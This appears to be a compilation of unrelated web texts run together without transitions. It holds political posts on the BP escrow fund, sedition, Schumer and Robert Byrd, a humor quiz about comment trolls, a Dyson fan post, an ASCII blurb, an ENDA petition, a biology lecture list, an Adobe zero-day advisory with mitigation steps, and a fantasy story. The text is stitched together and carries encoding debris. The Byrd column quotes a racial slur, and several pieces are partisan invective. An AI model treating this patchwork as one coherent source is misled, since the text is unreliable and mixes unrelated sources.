The Obama administration and BP seem to have come to a solution on paying for damages from the Deepwater Horizon oil spill , with the $ 20 billion escrow account to pay out damages to claimants .
And since everything that a president does will get attacked by opponents , some Republicans have come out strongly against it -- with the sum total of charges being that it will turn into a political slush fund procured through dirty Chicago thug tactics that will be paid out to ACORN .
• Rep. Michele Bachmann ( R - MN ) vigorously attacked the idea : " The president just called for creating a fund that would be administered by outsiders , which would be more of a redistribution - of - wealth fund , " Bachmann said on Tuesday , also adding that BP should say , " We 're not going to be chumps , and we 're not going to be fleeced . "
Bachmann later backtracked on Wednesday , saying that BP should pay for all of the damages involved , but that the fund should not be " an unending pot of money . "
• The Republican Study Committee , a group of conservative House members , released a statement Wednesday bashing the fund -- and seeming to criticize BP for accepting it .
The group 's chairman , Rep. Tom Price ( R - GA ) , said in a statement that while BP should be held responsible for damages , " BP 's reported willingness to go along with the White House 's new fund suggests that the Obama Administration is hard at work exerting its brand of Chicago - style shakedown politics .
These actions are emblematic of a politicization of our economy that has been borne out of this Administration 's drive for greater power and control . "
• Rush Limbaugh said that the escrow fund would be a " slush fund , " and wondered where the money would end up going : " Who 's gonna get this money ?
Union activists ?
ACORN people ?
Who 's gonna get this money .
Let 's keep a sharp eye on who Feinberg gives this money to .
Because I 'm telling you , this is just another bailout fund , called something else , and we 'll see who gets it . "
• Gov. Haley Barbour ( R - MS ) has also voiced criticism -- saying that forcing BP to pay the money now would cut into their profits , thus making it more difficult to pay more down the line .
" If BP is the responsible party under the law , they 're to pay for everything .
I do worry that this idea of making them make a huge escrow fund is going to make it less likely that they 'll pay for everything .
They need their capital to drill wells .
They need their capital to produce income .
...
But this escrow bothers me that it 's going to make them less able to pay us what they owe us .
And that concerns me . "
• Also on Fox News , Stuart Varney and Sean Hannity speculated that the account would be used as a " political slush fund . "
• In the House committee hearing just this morning on the spill , Rep. Joe Barton ( R - TX ) referred to the fund as a " $ 20 billion shakedown . "
Editor 's note : Brenna Ehrlich and Andrea Bartz are the sarcastic brains behind humor blog and soon - to - be - book Stuff Hipsters Hate .
When they 're not trolling Brooklyn for new material , Ehrlich works as a news editor at Mashable.com , and Bartz holds the same position at Psychology Today .
( CNN ) --
So you 're surfing along on your favorite website when you see something that gets your plasma boiling -- so much so that that pulsating vein above your eye is about to burst .
The cause of this Web - induced stress could be an opinion that just does n't jibe with yours .
It could be that author 's pompous head shot .
Either way , your twitching fingers scroll to the bottom of the page -- past whatever useless garbage you have just consumed .
You 're going to the comments section -- that oh - so democratic zone of the internet .
But be careful , impassioned Interneteur -- at this very moment you have the potential to transform from a perfectly pleasant person into that most loathed and feared Web dweller : the troll .
While you should feel entitled to join the discussion , and while we 've all " trolled out " at one point or another ( the anonymity of the ' net certainly lends itself to oozing venom , like a snake doing battle with a mongoose ) , it 's best to pause before pressing " post . "
Ask yourself :
Are you contributing to the online dialogue or just grunting unintelligibly ?
Take our quiz to learn how to rise above the Tower of Babel that is the comments section :
Question :
You spot an egregious factual inaccuracy , break in logic or unsubstantiated claim in an article you 're reading .
You proceed to :
a ) .
Give a frustrated sigh , log into your commenter account -- which features your real name -- and compose the following message : " Hey , [ insert author name here ] , in paragraph three in which you describe [ XYZ ] , you seem to be in error .
[ Explanation ] . "
Then you drain the last dregs of your coffee and return to work .
b ) .
Merely scroll to the bottom ( having not actually finished the article ) , copy a link to your inane website / blog / product , pen a message akin to " What a useful resource for a person like me ! " ( bonus points if the sentence does n't actually make sense ) and paste said link under said message .
You may , in fact , be a robot .
c ) . Completely disregard all previous comments and correct the author of his or her mistake , even though about 15 people already have done so .
d ) . Nearly black out with rage , roar into the abyss that is the idiocy of the internet and -- fingers all akimbo -- type : " YOU'RE SO FREAKING STUPID !!!!!
I AHTE YOU !!!!!!!!!!!!!!
SHUT THE HELL UP !!!!!!! "
After which , you down the last drops of your Monster Energy drink , wipe the Cheetos residue on your athletic shorts and bellow up the basement stairs , " MOM !!!
WHAT'S FOR DINNER ??? "
Now for the key :
A : Useful -- if not slightly caustic -- contribution to internet society
Congrats !
You are the glue that holds the Web together .
A descendent of the " lady who writes letters to the paper , " you keep bloggers and writers on their terrified toes .
Other platforms to consider :
Why not start your own blog ?
You seem to have all the answers .
We suggest a simple platform , such as Posterous or Tumblr , and a branded , slick - looking homepage that integrates your blog and all of your social networks ( your Twitter feed , Facebook status updates , etc ) .
Try Flavors.me , which makes designing such a website easy .
B : The shameless self - promoter
The offspring of the still - kickin ' telemarketer , you spread your insipid message where it is clearly not welcome .
Other platforms to consider : Might we suggest a less annoying option ?
Link exchanges .
Merely ask another site to link to yours if you link to theirs .
Thus , everyone wins and no one vows to track you down and murder you in your sleep .
C : The echo
Instead of making like some highly trained macaw , why not contribute to the conversation ?
Is n't that what a comments section is for ?
Other platforms to consider : Twitter .
Just go retweet some stuff , mmkay ?
That way you 're sharing an opinion / story / something of value with your followers with proper attribution , instead of driving the moderator to alcohol abuse .
D : The classic troll
We know , we know -- puberty can be a difficult time .
There 's your changing body , the fact that you have yet to kiss a member of the opposite sex , the -- Huh ?
You 're 45 ?
Nevermind .
Say " hi " to your mom for us .
...
Other platforms to consider : Formspring.me .
This platform allows members to ask anonymous ( if they so choose ) questions of other users who are crazy / brave enough to invite such inquiries .
The site has gained some cred lately -- allowing users to post questions to Twitter , Facebook , Tumblr , Blogger and Wordpress -- but it 's definitely a prime spot for those who enjoy ragging on others for no reason except their all - consuming insecurity ( i.e. , amid the legit interesting queries , questions of the " ' Why are you so stupid ? " variety are unfortunately common . )
Do what you will , but do n't blame us when someone terms - of - services you into oblivion .
Actually , better yet ... go outside for once .
Advertisements
The Atlantic ’s Andrew Sullivan was on the syndicated Chris Matthews Show today , and he said that the Beck , Palin , Limbaugh and Fox News are calling the government illegitimate , and are committing sedition .
Sullivan said , “ This is about the moment when America ’s divides go right up to calling the government , not wrong , but illegitimate . ”
Let ’s examine the law and see if the right wing is behaving seditiously .
Here is the video courtesy of Media Matters :
This all started with Joe Klein ’s comments last week :
Advertisements
Sullivan agreed with Klein and reinforced his point , “ I ’m more with Joe than I am with the Fox News Republican National Committee coalition machine , sort of this great machine spewing out an alternative reality to reality every minute of the day .
Look , dissent is great and important , and I believe , I am free speech absolutist , but this essentially accusing the president , the duly elected president , of being illegitimate and even treasonous , with respect to what the United States is , and it ’s important to recognize that is what they are saying .
It ’s what they believe .
Sarah Palin ’s little husband was a part of a secessionist movement , there ’s been secession movements in the South .
This is a replay .
You know this is Confederate history month .
This is about the moment when America ’s divides go right up to calling the government , not wrong , but illegitimate . ”
He later blasted the idea that Beck and Limbaugh should be excused because they are entertainers , “ Look , I ’m tired , I have to say of this notion that someone like Beck and Limbaugh can be excused because they are entertainers , as if that is an excuse for saying substantively what they are saying and for controlling the Republican Party .
Look , who in the Republican Party have actually pushed back against Beck or Limbaugh or these other nut cases ?
I mean , that ’s the truth and because there is no resistance in the Republican Party , the Republican Party is Fox News .
That ’s the head of the Republican Party . ”
Here is the definition of sedition according to the US Code :
” If two or more persons in any State or Territory , or in any place subject to the jurisdiction of the United States , conspire to overthrow , put down , or to destroy by force the Government of the United States , or to levy war against them , or to oppose by force the authority thereof , or by force to prevent , hinder , or delay the execution of any law of the United States , or by force to seize , take , or possess any property of the United States contrary to the authority thereof , they shall each be fined under this title or imprisoned not more than twenty years , or both . “
Are Beck , Palin , Limbaugh , and Fox News conspiring to overthrow , put down or destroy the US government , or are they electioneering in order to put the Republican Party back in power ?
My own personal view is that when they start calling for revolution , they are walking the line towards sedition , but by the letter of the law , I do n’t think they are engaged in seditious activity .
The path they are currently on could easily slip into sedition if they get more extreme and start calling for armed revolution or rebellion .
Kelly O’Donnell had it all wrong though .
Beck and Limbaugh should not be simply dismissed as entertainers , because their audiences do n’t view them that way .
To the people who are loyally devoted to Beck , Limbaugh , Fox News , and Palin , they are trusted sources of information , and in almost every case the only source of information that these individuals turn to .
They should not be dismissed .
Their misinformation and propaganda should be refuted at every turn .
Ignoring them and leave their lies unchallenged will only allow their misinformation to take root .
I have often thought that Chuck Schumer was the worst that we could get in terms of a politician .
He was one of the biggest defenders of the government ’s actions at Waco , he was a big supporter of the assault weapons ban , and yet he grins while firing this nice piece of hardware .
I think I also have been aware of Schumer because he was “ my representative ” for my formative years , growing up in New York State .
In this context I loved Glenn Greenwald ’s recent description :
… I ’ve come to see the Democratic Party ( and its apologists and loyalists in the pundit class ) much differently now that it ’s in power rather than out of it .
Just look at Schumer himself .
He is n’t some obscure Democratic official ; he ’s one of its leading figures .
He ’s not one of those dreaded Blue Dogs or “ conservative ” Democrats which Party pundit - apparatchiks and reverent Obama loyalists love to exploit to excuse the Party ’s flaws ( do n’t blame the weak and helpless Obama ; he is a prisoner to those bad , powerful conservative Democrats ) ; rather , Schumer is considered progressive , or at least mainstream , within the Party , representing one of its largest and bluest states .
If anyone is the face of the mainstream Democratic Party , it ’s Chuck Schumer .
That ’s why he ’s clearly the most likely replacement for Harry Reid to become Senate Majority Leader if Reid loses in November .
But look at what Schumer represents , who he is .
Schumer championed countless , radical Bush appointees ( including John Bolton , Michael Mukasey and Michael Hayden ) , but then sabatoged Obama ’s appointment of Chas Freeman due to insufficient devotion to Israel .
As The New York Times documented , he has long served as one of Wall Street ’s most loyal and devoted servants , reaping huge benefits for himself and his Party .
As the financial reform package gets negotiated and watered down , Schumer leads the way in doing Wall Street ’s bidding .
After spending years sucking up union money , he just congratulated Blanche Lincoln for fighting unions ( and , showing how cynical he is , also congratulated her for fighting Wall Street even as business interests almost single - handedly funded her campaign and as he himself continues to serve as the most devoted property of bankers ) .
So that ’s Chuck Schumer : suffocate Gazans ; champion Bush national security appointees ; punish those with insufficient devotion to Israel ; serve Wall Street .
And that , by definition , is the mainstream of the Democratic Party .
It ’s been a long - running joke that Robert C. Byrd was the living senator who ’d named the most monuments after himself .
In addition to placing an illegal , taxpayer - funded statue of himself in the West Virginia State Capitol , Byrd ’s extraordinary narcissism led to the creation of a vast array of public works , monuments and roads , all bearing the late senator ’s oft - sullied name .
Monday morning , at the age of 92 , Byrd passed away .
This week we ’re going to hear a lot of news stories lauding a man who held the dubious distinction of being the longest serving senator in U.S. history .
It ’s worth noting that this champion among Democrats will leave behind a legacy of bigotry , racism and hypocrisy that flies directly in the face of the values his party claims to hold so dear .
In 1942 , if you were driving down the road that Byrd would eventually rename the Robert C. Byrd Expressway , it would ’ve been best if you were n’t African - American .
West Virginia was a state notorious for its mistreatment of minorities .
Racism was a sad fact of life , and Byrd would n’t have had it any other way .
We know this because he ’d recently been elected to the position of “ Exalted Cyclops ” in the Ku Klux Klan .
He held the title for a year , leaving the organization in 1943 .
Later in his political life , he would portray his Klan tenure as a youthful mistake .
Mistake or not , he remained sympathetic to the cause .
Three years after resigning , he famously claimed , “ The Klan is needed today as never before , and I am anxious to see its rebirth here in West Virginia . ”
In the 1960 ’s , Byrd again emerged as a lofty symbol of tolerance when he came out against the landmark 1964 Civil Rights Act.
Congressional Democrats stood firm against the measure in a filibuster that lasted a whopping 83 days .
Byrd himself led the charge by personally holding the floor for 14 hours .
To his chagrin , Senate Republicans forced the bill through .
Not to be deterred , however , Byrd returned the following year and tried to put an end to the 1965 Voting Rights Act , which outlawed discriminatory practices that had kept African - Americans out of the voting booth .
Again , he failed .
Twenty years later , he joined the Baptist Church and allegedly saw the error of his ways .
He would often cite his religious awakening as a catalyst that opened his eyes to the evils of intolerance .
With his racism in check , he turned his attention to pork barrel spending and , in 1999 , became the first person in the history of the United States government to secure over one billion federal taxpayer dollars for his state .
Much of that money has gone to fund pet projects such as a pair of “ Robert C. Byrd Federal Buildings , ” the “ Robert C. Byrd Institute for Advanced Flexible Manufacturing ” and the “ Robert C. Byrd Federal Correctional Institution . ”
His constant spending earned him the title “ King of Pork . ”
In 2001 , Byrd again inserted his enlightened viewpoint into the national racial debate .
Apparently , his 1984 epiphany was n’t quite enough to dull his hostility .
He caused a controversy when he told Tony Snow , “ I think we talk about race too much . ”
He should have quit there .
Unfortunately , seconds later , he added :
There are white niggers .
I ’ve seen a lot of white niggers in my time , if you want to use that word .
We just need to work together to make our country a better country , and I ’d just as soon quit talking about it so much .
A quick note to future Senators : if you ’re in the public eye , and that ’s your best quote about racism , you really are better off not talking about it .
To quote President Obama , “ America has lost a voice of principle and reason . ”
May he rest in peace .
After offering the Senate 50 years of hypocrisy , greed and racism , it ’s been announced that the senator will receive a funeral with full military honors .
One wonders if African - American soldiers will be allowed to attend .
After all , in 1948 , Byrd fought vigorously against allowing the integration of the armed forces .
Perhaps , to honor the senator ’s own desires , minority servicemen should be allowed to view his funeral from a separate , but equal , location .
With a little luck , Senator Byrd will serve as the last vestige of an era in which such despicable viewpoints were able to openly thrive .
Robert Laurie is a Michigan - based conservative columnist and freelance writer .
He also runs a daily political commentary blog at RobertLaurie.net .
Note : Video is after the jump because Dyson is n't paying me anything .
What did the balloon say to the Dyson fan ?
Blow me .
Get it ?
Me neither .
This is a balloon obstacle course made entirely out of Dyson 's new bladeless fans .
Dyson engineers were asked to show how inducement and entrainment of air works on the Air Multiplierâ „ ¢ fan .
If you watch closely , the balloon is sucked from behind and to the side of the fan this is inducement and entrainment at work .
Lots of experimentation with different sized balloons and other objects produced this video .
And although edited to include our successful attempts , the video is made from completely genuine footage ( and no , the balloon isnt attached to anything ) .
As a man who 's no stranger to lots of " experimentation " with different sized balloons and other objects , I 've got to admit : there 's still a toy fire truck floating around in me somewhere .
Hit the jump for the ride of this balloon 's life !
Youtube
Thanks to Jolly Green Gi-Ant , josh and Terri , who once tried making a hovercraft out of ceiling fans because they do n't understand science ( you 're gonna need an air conditioner too ) .
as mon-cii
A Statement :
The American Standard Code for Information Interchange , ASCII , pronounced " ask - key " ( ' æski ) , is the common / standardized code for computer equipment .
It was first proposed in 1963 , and finalized in 1968 .
The standard ASCII character set consists of 128 decimal numbers ranging from zero through 127 assigned to letters , numbers , punctuation marks , and the most common special characters .
For me the optimal viewing distance is roughly 8 feet , which I think is about two and a half meters or so ; never been very good with meters .
For first time viewers a distance of 20 feet is suggested .
Squinting sometimes helps .
Good light is a must .
The Extended ASCII Character
Set also consists of 128 decimal numbers and ranges from 128 through 255 representing additional special , mathematical , graphic , and foreign characters .
Someone once said that if you were to put an infinite number of monkeys in a room for an infinite amount of time and gave each one a typewriter , eventually they would reproduce the entire works of Shakespeare .
Someone else has since added that now , thanks to the Internet , we know that this is not true .
Please sign our petition asking Senator Richard Durbin , the second highest ranking Senator in the Senate , to become a forceful advocate for an ENDA vote NOW !
While we are pleased to note that Senator Richard Durbin has co-sponsored the latest Employment Non-Discrimination Act ( ENDA ) , the levels of discrimination against lesbian , gay , bisexual , transgender and queer ( LGBTQ ) workers in this country , creates an urgent need for Senator Durbin to take a more public stance .
We ask that he sign our pledge below calling for his forceful advocacy for passage of a transgender - inclusive ENDA this year .
While polls show that 89 percent of the overall population % u2014 and 77 percent of Republicans % u2014 support workplace equality for LGBTQ people , fear - mongering and transphobic rhetoric are being spread and echoed by the far right .
Now that it is becoming less palatable to openly discriminate against lesbians and gays , transgender people have become the primary targets of the culture war .
According to the National Transgender Discrimination Survey , 97 percent have experienced mistreatment , harassment or discrimination on the job .
Of those surveyed , 47 percent were denied a job , a promotion or were fired because of their gender identity .
Despite higher levels of education than the population at large , 15 percent of transgender people earn less than $ 10,000 per year , twice the national average for that income level .
Twenty - seven percent reported incomes of $ 20,000 or less .
Meanwhile , only 21 states and the District of Columbia mandate workplace protections for sexual orientation , and a mere 12 states provide legal protection for gender identity .
As you know , the nation % u2019s largest employer , the U.S. military , is exempted from ENDA and will remain a closet for LGBTQ military service - people until Don%u2019t Ask , Don%u2019t
Tell is repealed .
Hundreds of organizations have signed on to demand passage of ENDA Now ( http://endanow.com/).
We ask you , Senator Durbin , to gather your colleagues in the Senate and stand before the media to address this crisis in the American workplace head - on .
Passage of ENDA this year would be a crucial step in our struggle for full federal equality .
Pledge :
I , Senator Richard Durbin , agree to stand before my colleagues in the U.S. Senate and the media to forcefully declare the urgent need for a transgender - inclusive ENDA in 2010 .
While all LGBTQ people in this country remain second - class citizens , it is a crisis that 97 percent of transgender people , according to the National Transgender Discrimination Survey , have experienced mistreatment , harassment or discrimination on the job .
Federally - sanctioned discrimination of the millions of U.S. workers who are sexual minorities must finally pass into history .
The time is now to stop the lies , the scapegoating and the bigotry against those who are lesbian , gay , bisexual , transgender and queer .
I appeal to my colleagues in the Senate to end our sad history of anti-LGBTQ bigotry and pass a transgender - inclusive ENDA in 2010 .
Biology and Biological Engineering
This is a collection of audio / video courses and lectures in biology and biological engineering from educational institutions around the world .
The courses and lectures included in this section cover : animal physiology , astrobiology , biochemistry , bioelectricity , bioenergy , bioengineering , biomathematics , cell biology , evolution , general biology , genetics , human anatomy , mathematical biology , microbiology , molecular biology , neurobiology , origins of life on Earth , plant physiology , and wildlife ecology .
Video Genomes and Diversity
Video Astrobiology and the Search for Extraterrestrial Life
This is a collection of lecture series and informal talks discussing various biomedical issues such as biodiversity , neuroscience , infectious diseases , stem cells , evolution , obesity , cancer , immunology and RNA .
This provides free on - demand lectures on various topics in biological research : Biological Mechanisms , Neuroscience , Cell Biology & Medicine , Chemical Biology & Biophysics , Developmental Biology & Evolution , Global Health & Energy , Bio Techniques .
Video Presentations
This provides on - demand streaming video presentations on biology and related topics including stem cells , animal behavior , the pathway to genomic medicine , structures and functions of genomes , ecosystems , and food and fitness .
Adobe issued an alert late Friday night to warn about zero - day attacks against an unpatched vulnerability in its Reader and Flash Player software products .
The vulnerability , described as critical , affects Adobe Flash Player 10.0.45.2 and earlier versions for Windows , Macintosh , Linux and Solaris operating systems .
It also affects the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows , Macintosh and UNIX operating systems , Adobe said .
From Adobe 's advisory :
This vulnerability ( CVE - 2010 - 1297 ) could cause a crash and potentially allow an attacker to take control of the affected system .
There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player , and Adobe Reader and Acrobat .
The Flash Player 10.1 Release Candidate " does not appear to be vulnerable , " the company said .
Mitigation Guidance
In the absence of a patch , Adobe recommends deleting , renaming , or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat 9.x .
This will mitigate the threat but users will experience a non-exploitable crash or error message when opening a PDF file that contains SWF content .
The authplay.dll that ships with Adobe Reader and Acrobat 9.x for Windows is typically located at C : \Program Files \Adobe \Reader 9.0\Reader\authplay.dll for Adobe Reader or C : \Program Files \Adobe \Acrobat 9.0\Acrobat\authplay.dll for Acrobat .
Adobe Reader and Acrobat 8.x are confirmed not vulnerable .
Adobe security chief Brad Arkin said the company received the first malicious sample around 10:30 AM on Friday .
There is no information on when a patch will be available .
Root By Threetoe P anic took hold of the victim ’s mind , compelling him to fight all the harder .
The rope cut into his throat , holding back the fearful screams .
He reached behind and grabbed the killer ’s hands as they pulled the noose tighter .
The victim tried to pull the predator over his shoulder but faltered as he felt the fangs sink into his long upright tail .
Tears of pain and rage streamed from the squirrel man ’s eyes as the werewolf pulled him up against a tree and squeezed out the last of his life .
Evil glowing eyes scanned the nighttime forest .
All around , in the bushes , rodents looked on as the werewolf fed .
Unable to watch his master torn apart , a small red squirrel darted away into the brush .
Not knowing where to turn , the little creature rushed to where all his instincts told him to stay away , the elven orchard .
There dwelt the haughty ones , the ones that turned up their noses at the people of the forest .
So his master told him , but always , he heard admiration in the squirrel man ’s voice .
Suddenly , the little squirrel stopped .
Matagan was not dead a minute and already the predators were after him .
High above , he heard the wings of an owl , barely perceptible above the silence .
He dare not run across open ground , but if he stayed at the trunk of the tree , death was certain .
Coyotes bayed in the distance .
The dark wood was full of killers .
Something moved in the tree above , an owl woman .
Queen of the night , she scanned the forest floor with her all - seeing eyes , her talons gripping the tree branch .
" I hear you little mouse , " she said .
" Come out , that I may eat you . "
The squirrel felt his chest tighten , his heart beating loud -- too loud .
A light shone out into the forest .
Someone behind it coughed twice .
The squirrel looked up .
The owl woman was gone .
Quickly , he made his way toward the light .
At the base of the mighty tree , an elf guard stood , picking grime from his ring with a shining blade .
Animal people rarely came here , and the tiny squirrel had never been without his keeper .
The elves believed they had lordship over the forest .
The forest spirit proclaimed no such thing .
The elves domain lay as far as an arrow ’s flight from their orchard .
At least that ’s what Matagan told the squirrels , when they were young .
After much consideration , the squirrel hopped out into the light of the glow - flowers .
" What are you doing here , little guy ? " asked the elf , sheathing his weapon and kneeling to inspect the creature .
" You are one of Matagan ’s charge , are n’t you ? "
" Come , let us sort this out . "
The squirrel was surprised by the kindness of the elf .
For a moment he dared believe everything would be set right , that he could return home and the squirrels be safe .
This elf seemed a brave one .
He was broad of chest and wide of chin .
His hair was as red as the autumn leaves and he wore it in a careless manner like that of an adventurer in one of Matagan ’s stories .
The elf carried the squirrel up the smooth trunk of the tree , using holds not even a squirrel could see .
Guards saluted as the elf passed in onto the main dais of the elven home tree of Doulan .
There he found Princess Cameda and her hangers - on were drinking deep from a ram ’s horn .
The latest tonic Druid Nthari had concocted , thought the elf .
He frowned at that .
It was wrong that they should act so , partying every night when others suffered .
As for the druid , one could only wonder how he kept the spirit ’s favor .
" Captain Itho , " shouted the princess from her pillowed seat , a hint of fierceness in her eyes , " why do n’t you join us ? "
The captain ’s hand jumped from the ring with which he had been fiddling and prodded the squirrel under the chin .
The high elven nobles lounged on leafy couches .
They laughed and pointed at him .
The princess laughed with them , but when she turned to face him , she was no longer smiling .
Itho bore a weary expression of frustration and pity .
" I seek the druid , " he said .
The princess indicated the way with a bored gesture , taking care not to look at him .
As Captain Itho carried the squirrel across the twisted branches he began humming an ancient tune .
It was not unlike the songs Matagan used to sing to them at day ’s end .
How he wished the elf could hear his words .
He seemed like he could truly be their champion .
At last they reached it , a crude hut made of two great leaves .
As Itho approached , the druid Nthari emerged .
He was pale and stretched , his hand covered with a sticky blue substance .
" What ’s this ? " demanded Nthari .
" A red squirrel , " said Itho , " one of Matagan ’s tribe . "
The druid leaned in and squinted at the squirrel .
He could sense the darkness all about it .
Seeing the seriousness in Itho ’s face , the druid frowned .
" Bring it inside , " said Nthari .
Inside the magic fire burned , smokeless and bright .
As Itho took his seat by the fire , Nthari fed it handfuls of dead grass he had collected from his garden .
The flickering flame played across the druid ’s stark features .
He was skin and bones .
The captain looked into the sunken eyes that were now staring back at him .
" Yes Itho , I have n’t too many more years to live .
The spirit told me so , " said Nthari coughing into his shirt .
" Do you think it so bad I give others the joy I was denied in life ? "
" What the princess does with her life is her business , " said Itho .
" Now tell of the little one . "
The sickly elf reached over and plucked up the squirming animal with a sticky hand .
The squirrel cried out as the druid rolled it over and over in his hands , stopping to poke at it with bony fingers .
Itho came to his feet and reached out to snatch away the squirrel from the sadistic elf .
Suddenly the fire went dim .
The captain froze , not daring to tempt the unseen forces .
" Matagan is dead , " said Nthari , " murdered by a wicked creature of the forest . "
The druid looked at Itho and laughed , dropping the squirrel and rising to fill another flask .
Angered , Itho took him by the wrist .
He stared into the elf ’s wine - stained face .
Nthari ’s eyes were those of a dead fish .
He had given up on life , on the wood .
How then could he speak for the forest spirit , he who trafficked only in darkness ?
Itho slapped the drunken elf across the cheek .
" The spirit told me , " shouted the crazed druid .
" You are to take up a quest for vengeance .
As your shaman I must demand it of you . "
The druid laughed with mad glee .
Itho could only hold his gaze so long before he released him and strode from the tent , stopping to gather up the little squirrel , clearly as frightened as he was .
Itho did n’t stop as he passed by the princess ’s party , deaf to the cat calls of the delinquent elf lords .
The guards at the exit looked at him , questioning .
Standing for a moment , Itho reached up onto his chest and plucked off his badge , dropping it at the guard ’s feet .
As he descended the tree , his mind burned with anger .
He was bound to the quest , but he would no longer be bound to these people .
The princess watched over her gilded wine glass as the elf disappeared over the side .
The squirrel snuggled against Itho ’s neck as he jogged through the dark forest .
He fumed with anger , but as the squirrel clicked and purred he found himself at ease .
As the first light began to peek through the leaves , it found the elf humming a merry tune .
At last he came to rest against an old rotting stump .
He released the squirrel and dropped a few seeds from his pocket .
The squirrel looked up to see the elf once again fiddling with his ring .
He looked down at the squirrel .
" You are looking at this ? " asked Itho .
" This was given to me long ago , by someone very dear to me .
Now it is all I have left . "
Itho gave the squirrel a curious look .
" You know , we have n’t given you a name yet . "
The squirrel lifted up on its hind legs , gobbling a seed into its cheek .
" You need a strong - sounding name , " said Itho .
" You shall be called Root . "
The squirrel chirped with joy , daring to hope for the first time .
Together they tramped through the wood , careless avengers on a quest for justice .
A robin man darted across the trail .
Itho nodded to the bird man with a flashing smile and strode on by .
The bird man stared at him .
Root watched as the robin man plucked up a giant worm and swallowed it down into its bright orange belly .
As beautiful as he was , thought Root , the robin man still had the hungry eyes of a predator .
As Itho skipped on his merry way , Root was once again plagued with doubt .
His new elf master knew nothing of the danger he now faced .
They were nearing the scene of the crime .
Itho could feel Root clinging tightly to his neck .
He drew his sword but could see nothing in the fading light .
He prodded the ground until his sword tip bumped against a large rodent ’s skull .
The elf knelt down and brushed away the damp leaves .
The forest had been quick to claim the body of his old friend .
Root watched as the elf drew invisible lines in the air , calling on the forest spirit to claim its fallen son .
" I would have killed him , " said a deep , cooing voice from above , " had he not the protection of the forest spirit . "
Itho looked up to see a great shadow swoop down from above .
It flapped its wide brown wings over a feathery , feminine body .
Huge black eyes stared out from a bright white face .
Itho pulled his sword as the creature hopped forward on be -taloned feet .
It hooted twice , bobbing its head , its eyes following the motion as Root squirmed under Itho ’s shirt .
" Buldagra ! " shouted the elf warrior .
Pointing his sword , he said , " If you know what happened here , tell us . "
" Us ? " said the owl woman , twisting her head all the way around .
" I am hungry .
Perhaps if you give me your little friend I ’ll tell you . "
The elf advanced , planting his sword point into the creature ’s belly .
" You will tell me what I want to know , or I will pluck you myself . "
The owl woman threw back her head and let out a long mournful cry .
When she looked on Itho again , Buldagra ’s huge eyes were filled with hatred .
" You elves are always above reproach , " she said , " but tell me .
How do you know the forest favors your silly quest for vengeance ? "
" Because it is justice I seek , " said the elf , withdrawing his weapon .
" The animal that did this will pay . "
Buldagra launched into the leaf - shrouded sky .
" It was no animal that did this , " she said .
" It was a monster . "
" But how will I find it ? " shouted Itho .
The owl ’s curse fell faintly over the trees .
" There is no need .
He will find you . "
That night Itho trudged through the underbrush , hacking through the thorny vines with his sword .
He was headed in the direction of the Dark Mountains , the place from which all monsters came .
Root hid inside the elf ’s pocket , his eyes peeking out into the darkened forest .
He could sense forces gathering around him .
If only he could understand , thought Root , I could tell him .
Then he saw that the elf felt it too .
The forest spirit had long since written his destiny in the rings of the trees .
At last they broke out onto a wide clearing .
" Itho , " said the werewolf , " you have come at last . "
The monster stood before the trees , casually regarding his foe .
There was something familiar about this villain , thought Itho .
It was n’t the flashing yellow eyes , or the dark , shaggy pelt .
Nor was it the snaggletooth grin or the razor sharp claws .
It was the cocky attitude that betrayed its false bravery .
Itho felt his breast swell with pride and rage .
He drew his sword slowly .
It would be a pleasure to put this creature down .
" I see you bear the princess ’s favor , " said the werewolf , " for you wear her ring . "
" Folly ! " cried Itho .
" What do creatures of the underworld know of such matters ? "
The werewolf struck a martial pose .
Itho snarled like a great lion and charged across the field .
The monster blocked blow after blow and Itho cursed him a murderer .
It was n’t long before Itho realized the creature was playing with him .
Bit by bit , he felt his strength fade away .
Through force of will , the elf fought on .
The wolf monster caught the final stroke by the wrist .
Root felt its hot breath as the creature leaned close and said , " I ’m going to cut that ring off of you . "
" Niira ? " asked Itho .
" My brother ? "
The monster sank its claws into Itho ’s chest .
" The princess is mine , " it hissed , " and mine alone ! "
Screams echoed through the forest as the werewolf tore into Itho ’s body .
The sword tumbled to the ground as the elf fell .
The werewolf climbed on top of him , clamping its jaws across the dying elf ’s neck .
Root hopped out of the Itho ’s pocket , ran down the elf ’s arm , and pulled the ring free .
The monster raised its eyes to see the tiny rodent holding the ring .
It swallowed the treasure with one quick gulp .
The werewolf shouted denial and raced after it .
-- Princess Cameda leaned back on her leafy couch , laughing heartily .
It seemed a long time since she had a care .
Let shepherds care for their animals .
An elf ’s place was in the trees , above the rest .
Again came thoughts of Itho and the dangers he faced every day .
She shook her head and laughed , reaching for another glass .
Her eyes strayed to the edge of the great wooden deck and the small animal that stood there .
The creature hopped toward her , until she could see its fur was slick with blood .
The princess rolled from her seat and leaned closer .
The squirrel stared at her for a moment then spit forth the golden ring .
The princess ’s face went pale .
" No ! " she screamed .
A dozen emotions played frantically across Cameda ’s face .
She snatched up the squirrel and ring and stomped toward the druid ’s chamber .
There she found Nthari , passed out on the floor .
" What is the meaning of this ? " she demanded .
The druid did not stir .
She dropped the squirrel and bent over the drunken elf .
He was dead , an empty flask on the floor near the body .
The squirrel leapt up onto her skirt and hid in her pocket .
Stricken with grief , the princess felt her life running out of options .
The elf lords grew silent , watching the pride of their merry circle walk as a ghost to the edge of the tree .
The guards reached out to her as she leapt out into the air , catching a vine and rappelling down the side of the trunk .
Once at the bottom , she set out into the woods .
Closing her eyes , she let her instincts take her to the only one who could save her .
After a night ’s wandering , weariness took hold of her limbs .
Perhaps to rest for a moment , she thought , and dream of her friends now gone .
She awoke in the sacred grove .
All around satyrs danced and played lively music .
The squirrel chirped and chattered .
The princess looked to see a wide tree , bearing the gnarly face of a man .
It bent down a branch and shook down some seeds to the appreciative squirrel .
" What ? " said Cameda , " What is going on ? "
The tree looked on her and she felt shame .
Dear Itho , she thought .
It is all my fault .
A rough hand took her wrist and pulled her up .
Her tears became laughter as she danced with the satyrs into the night .
As the figures around them spun , the tree god spoke strange words , twirling the squirrel around with its knotted finger .
The creature began to grow .
Cameda stepped into the circle , fascinated .
" The forest spirit , " she said , holding out her hand .
A shape lay before her , crackling with light .
A hand reached up and seized her palm .
At last , a squirrel man stood before the tree .
" What is your name ? " croaked the tree .
" I shall be called Root , " said the animal person .
" This is a good name , " said the tree , " for a keeper of the forest . "
The tree fell silent , and Cameda looked around confused .
All the strange creatures had vanished , leaving nothing but an old contorted tree .
